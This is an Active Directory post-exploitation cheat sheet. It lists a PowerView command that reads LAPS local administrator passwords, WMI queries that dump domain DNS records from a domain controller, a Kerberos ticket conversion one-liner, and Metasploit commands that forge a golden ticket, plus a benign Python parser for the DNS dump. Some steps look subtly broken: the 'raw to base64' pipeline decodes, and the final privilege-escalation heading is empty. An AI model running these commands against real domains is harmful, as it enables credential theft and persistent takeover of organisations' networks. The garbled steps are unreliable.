AD Post-Exploitation
Dump LAPS password
PowerView
Get-DomainComputer <COMPUTERNAME|wks*> -Properties samaccountname,ms-mcs-admpwd
Dump DNS records
Info: WMI version compatible with old DCs (can be adapted with wmic.exe if PowerShell is not installed). The records will be UTF-16 encoded, so run the command below on the resulting file before processing it.
dos2unix raw_records.txt
On the DC run the following command (the second form queries the DC remotely via -ComputerName, wrapped in quotes so that cmd.exe does not interpret the pipe itself).
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT TextRepresentation FROM MicrosoftDNS_AType WHERE ContainerName='<fqdn_domain>'" | fl > raw_records.txt
powershell -Command "Get-WmiObject -Class MicrosoftDNS_AType -Namespace Root\MicrosoftDNS -ComputerName <DC> -Filter \"DomainName = '<fqdn_domain>' AND TimeStamp=0\" | fl" > raw_records.txt
Optional formatting
cat raw_records.txt | grep TextRepresentation | cut -d " " -f 3,6 > a_records.txt
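A parser for the raw_records.txt dump, added here as an example that is not part of the original page. It decodes the UTF-16 output directly (so the dos2unix step is unnecessary), tolerates the optional [Aging:...] stamp that dynamically registered records carry, and extracts name and address by pattern instead of relying on fixed cut field positions. The sample dump is constructed; the record names and addresses are hypothetical.

```python
import re

# Constructed sample of what `Get-WmiObject ... | fl > raw_records.txt` writes:
# UTF-16 with BOM and CRLF line endings, blank lines between records, and one
# dynamically registered record carrying an "[Aging:...]" stamp.
SAMPLE_RAW = (
    "\n"
    "TextRepresentation : dc01.corp.local 3600 IN A 10.0.0.10\n"
    "\n"
    "TextRepresentation : wks01.corp.local [Aging:3616524] 1200 IN A 10.0.1.25\n"
    "\n"
).replace("\n", "\r\n").encode("utf-16")

# One A record line: owner name, optional aging stamp, TTL, class, type, address.
RECORD_RE = re.compile(
    r"^TextRepresentation\s*:\s*(?P<name>\S+)"
    r"(?:\s+\[Aging:(?P<aging>\d+)\])?"
    r"\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$"
)


def parse_a_records(raw: bytes):
    """Decode the UTF-16 dump; return (name, ip, ttl, is_dynamic) per A record."""
    text = raw.decode("utf-16")  # the codec consumes the BOM for us
    records = []
    for line in text.splitlines():  # handles CRLF without a dos2unix pass
        m = RECORD_RE.match(line)
        if not m:
            continue  # blank lines and any other fl output are skipped
        records.append(
            (m["name"].lower(), m["ip"], int(m["ttl"]), m["aging"] is not None)
        )
    return records


def to_hosts_lines(records):
    """Render 'ip name' lines, the shape a_records.txt is meant to hold."""
    return [f"{ip} {name}" for name, ip, _ttl, _dynamic in records]
```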
DC event auditing
auditpol /get /category:*
Ticket
Ticket converter
Info: Convert ccache tickets into kirbi (KRB-CRED) and vice versa.
From raw to base64 (strip spaces and line breaks before decoding; -D is the macOS base64 flag, use -d with GNU coreutils)
cat <ticket.raw> | sed 's/ //g' | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n//g' | base64 -D >> <ticket.b64>
Golden Ticket
Standard Golden
golden_ticket_create -d <domain> -g <relative identifier> -k <hash> -s <SID> -u <user> -t /tmp/golden.tck
post/windows/escalate/golden_ticket
Domain Administrator to Enterprise Administrator